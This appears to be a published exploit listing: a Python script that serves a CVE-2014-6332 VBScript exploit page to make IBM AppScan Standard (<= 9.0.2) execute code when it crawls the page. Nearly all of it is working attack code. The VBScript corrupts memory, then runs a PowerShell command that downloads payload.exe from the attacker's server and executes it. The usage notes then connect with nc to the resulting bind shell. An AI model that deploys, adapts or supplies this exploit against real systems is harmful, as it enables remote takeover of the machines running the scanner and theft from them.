IBM Security AppScan Standard <= 9.0.2 - OLE Automation Array Remote Code Execution Exploit

🗓️ 02 Jun 2015 — Reported by Naser Farhadi

IBM Security AppScan Standard <= 9.0.2 — OLE Automation Array Remote Code Execution. This Python script starts a small HTTP server that serves a page carrying the public MS14-064 / CVE-2014-6332 VBScript exploit together with a bind-shell payload executable. When AppScan crawls and renders the page, the exploit fires in the scanner's IE-based rendering engine, launches PowerShell, downloads payload.exe from the same server and executes it, giving the attacker code execution on the scanner host.

#!/usr/bin/python
 
import BaseHTTPServer
import socket
import sys
 
##
# IBM Security AppScan Standard OLE Automation Array Remote Code Execution
#
# Author: Naser Farhadi
# Linkedin: http://ir.linkedin.com/pub/naser-farhadi/85/b3b/909
#
# Date: 1 June 2015 # Version: <= 9.0.2 # Tested on: Windows 7
#
# Exploit based on MS14-064 / CVE-2014-6332 (OLE Automation Array), http://www.exploit-db.com/exploits/35229/
# If you can exploit IE, you can exploit AppScan (and Acunetix): the scanner renders the pages it
# crawls with the IE engine, so the same memory-corruption bug fires inside the scanner process ;)
# This Python script starts a small HTTP server on the attacker machine that serves the exploit
# page on every path and a Metasploit windows/shell_bind_tcp executable payload on /payload.exe
# (the file payload.exe is read from the working directory at request time).
#
# Usage:
#       chmod +x appscan.py
#       ./appscan.py                  (binds port 80, so needs root; payload.exe must be in the working directory)
#       ... point the scanner at http://<attacker-host>/ and wait for it to render the page ...
#       nc 172.20.10.14 333           (connect to the bind shell the payload opened on the scanner host,
#                                      on the port the payload was built with)
#
# Video: http://youtu.be/hPs1zQaBLMU
##
 
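class RequestHandler(BaseHTTPServer.BaseHTTPRequestHandler):
    """Serve the exploit page on every path and the bind-shell payload on /payload.exe.

    The VBScript embedded below is the public MS14-064 / CVE-2014-6332 ("OLE
    Automation Array") exploit and is served verbatim; this handler only adds
    the delivery logic around it.  When the scanner renders the page, the
    script launches PowerShell, which downloads /payload.exe from this server
    and executes it.
    """

    # Read from the working directory on every request (no caching), so the
    # file can be swapped without restarting the server.
    PAYLOAD_FILE = "payload.exe"

    # Characters accepted in an incoming Host header before it is echoed into
    # the VBScript download URL.  Anything else falls back to our own address,
    # so a hostile client cannot inject script into the page we serve.
    _HOST_CHARS = frozenset(
        "abcdefghijklmnopqrstuvwxyz"
        "ABCDEFGHIJKLMNOPQRSTUVWXYZ"
        "0123456789.-:[]"
    )

    def _callback_host(self):
        """Return the host[:port] the scanner should fetch the payload from.

        The Host header is whatever address the scanner actually used to reach
        us, which is the most reliable callback target on a multi-homed box.
        It is only trusted if it looks like a host[:port]; otherwise we fall
        back to the locally resolved hostname, as the original did.
        """
        host = self.headers.get("Host")
        if host and all(c in self._HOST_CHARS for c in host):
            return host
        return socket.gethostbyname(socket.gethostname())

    def _send_payload(self):
        """Serve PAYLOAD_FILE as a download, or a clean 404 if it is missing."""
        try:
            with open(self.PAYLOAD_FILE, "rb") as fh:
                data = fh.read()
        except IOError:
            # The status line has not been written yet, so a missing file
            # yields a proper 404 instead of a 200 followed by a traceback
            # and a truncated body.
            self.send_error(404, "payload.exe not found in the server's working directory")
            return
        self.send_response(200)
        self.send_header('Content-type', 'application/exe')
        # Without a Content-Length the client can only detect end-of-body by
        # connection close; giving it lets the downloader verify completeness.
        self.send_header('Content-Length', str(len(data)))
        self.end_headers()
        self.wfile.write(data)

    def _send_exploit_page(self):
        """Serve the HTML/VBScript exploit page, pointing it back at this server."""
        host = self._callback_host()
        page = ("""Please scan me!
                            <SCRIPT LANGUAGE="VBScript">
                            function runmumaa() 
                            On Error Resume Next
                            set shell=createobject("Shell.Application")
                            command="Invoke-Expression $(New-Object System.Net.WebClient).DownloadFile('http://""" + host + """/payload.exe',\
                            'payload.exe');$(New-Object -com Shell.Application).ShellExecute('payload.exe');"
                            shell.ShellExecute "powershell", "-Command " & command, "", "runas", 0
                            end function
 
                            dim   aa()
                            dim   ab()
                            dim   a0
                            dim   a1
                            dim   a2
                            dim   a3
                            dim   win9x
                            dim   intVersion
                            dim   rnda
                            dim   funclass
                            dim   myarray
 
                            Begin()
 
                            function Begin()
                              On Error Resume Next
                              info=Navigator.UserAgent
 
                              if(instr(info,"Win64")>0)   then
                                 exit   function
                              end if
 
                              if (instr(info,"MSIE")>0)   then 
                                         intVersion = CInt(Mid(info, InStr(info, "MSIE") + 5, 2))   
                              else
                                 exit   function  
                                          
                              end if
 
                              win9x=0
 
                              BeginInit()
                              If Create()=True Then
                                 myarray=        chrw(01)&chrw(2176)&chrw(01)&chrw(00)&chrw(00)&chrw(00)&chrw(00)&chrw(00)
                                 myarray=myarray&chrw(00)&chrw(32767)&chrw(00)&chrw(0)
 
                                 if(intVersion<4) then
                                     document.write("<br> IE")
                                     document.write(intVersion)
                                     runshellcode()                    
                                 else  
                                      setnotsafemode()
                                 end if
                              end if
                            end function
 
                            function BeginInit()
                               Randomize()
                               redim aa(5)
                               redim ab(5)
                               a0=13+17*rnd(6)
                               a3=7+3*rnd(5)
                            end function
 
                            function Create()
                              On Error Resume Next
                              dim i
                              Create=False
                              For i = 0 To 400
                                If Over()=True Then
                                '   document.write(i)     
                                   Create=True
                                   Exit For
                                End If 
                              Next
                            end function
 
                            sub testaa()
                            end sub
 
                            function mydata()
                                On Error Resume Next
                                 i=testaa
                                 i=null
                                 redim  Preserve aa(a2)  
                               
                                 ab(0)=0
                                 aa(a1)=i
                                 ab(0)=6.36598737437801E-314
 
                                 aa(a1+2)=myarray
                                 ab(2)=1.74088534731324E-310  
                                 mydata=aa(a1)
                                 redim  Preserve aa(a0)  
                            end function 
 
 
                            function setnotsafemode()
                                On Error Resume Next
                                i=mydata()  
                                i=readmemo(i+8)
                                i=readmemo(i+16)
                                j=readmemo(i+&h134)  
                                for k=0 to &h60 step 4
                                    j=readmemo(i+&h120+k)
                                    if(j=14) then
                                          j=0          
                                          redim  Preserve aa(a2)             
                                 aa(a1+2)(i+&h11c+k)=ab(4)
                                          redim  Preserve aa(a0)  
 
                                 j=0 
                                          j=readmemo(i+&h120+k)   
                                      
                                           Exit for
                                       end if
 
                                next 
                                ab(2)=1.69759663316747E-313
                                runmumaa() 
                            end function
 
                            function Over()
                                On Error Resume Next
                                dim type1,type2,type3
                                Over=False
                                a0=a0+a3
                                a1=a0+2
                                a2=a0+&h8000000
                               
                                redim  Preserve aa(a0) 
                                redim   ab(a0)     
                               
                                redim  Preserve aa(a2)
                               
                                type1=1
                                ab(0)=1.123456789012345678901234567890
                                aa(a0)=10
                                       
                                If(IsObject(aa(a1-1)) = False) Then
                                   if(intVersion<4) then
                                       mem=cint(a0+1)*16             
                                       j=vartype(aa(a1-1))
                                       if((j=mem+4) or (j*8=mem+8)) then
                                          if(vartype(aa(a1-1))<>0)  Then    
                                             If(IsObject(aa(a1)) = False ) Then             
                                               type1=VarType(aa(a1))
                                             end if               
                                          end if
                                       else
                                         redim  Preserve aa(a0)
                                         exit  function

                                       end if 
                                    else
                                       if(vartype(aa(a1-1))<>0)  Then    
                                          If(IsObject(aa(a1)) = False ) Then
                                              type1=VarType(aa(a1))
                                          end if               
                                        end if
                                    end if
                                end if
                                           
                                 
                                If(type1=&h2f66) Then         
                                      Over=True      
                                End If  
                                If(type1=&hB9AD) Then
                                      Over=True
                                      win9x=1
                                End If  
 
                                redim  Preserve aa(a0)          
                                     
                            end function
 
                            function ReadMemo(add) 
                                On Error Resume Next
                                redim  Preserve aa(a2)  
                               
                                ab(0)=0   
                                aa(a1)=add+4     
                                ab(0)=1.69759663316747E-313       
                                ReadMemo=lenb(aa(a1))  
                                
                                ab(0)=0    
                              
                                redim  Preserve aa(a0)
                            end function
 
                            </script>""")
        self.send_response(200)
        self.send_header('Content-type', 'text/html')
        self.send_header('Content-Length', str(len(page)))
        self.end_headers()
        self.wfile.write(page)

    def do_GET(self):
        """Dispatch: /payload.exe gets the binary, everything else the exploit page."""
        if self.path == "/payload.exe":
            self._send_payload()
        else:
            self._send_exploit_page()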
 
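if __name__ == '__main__':
    # Defaults reproduce the original behaviour: bind to the address the
    # local hostname resolves to, on port 80 (which needs root).  Both can be
    # overridden on the command line, because gethostbyname(gethostname()) may
    # resolve to a loopback or otherwise unreachable address on multi-homed
    # hosts, in which case the scanner never reaches us:
    #   ./appscan.py [bind_addr] [port]
    if len(sys.argv) > 1:
        bind_addr = sys.argv[1]
    else:
        bind_addr = socket.gethostbyname(socket.gethostname())
    port = int(sys.argv[2]) if len(sys.argv) > 2 else 80

    server = BaseHTTPServer.HTTPServer((bind_addr, port), RequestHandler)
    print("Http server started %s %s" % (bind_addr, port))
    try:
        server.serve_forever()
    except KeyboardInterrupt:
        pass
    finally:
        # Release the listening socket even if serve_forever() raised
        # something other than KeyboardInterrupt.
        server.server_close()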

#  0day.today [2018-04-01]  #
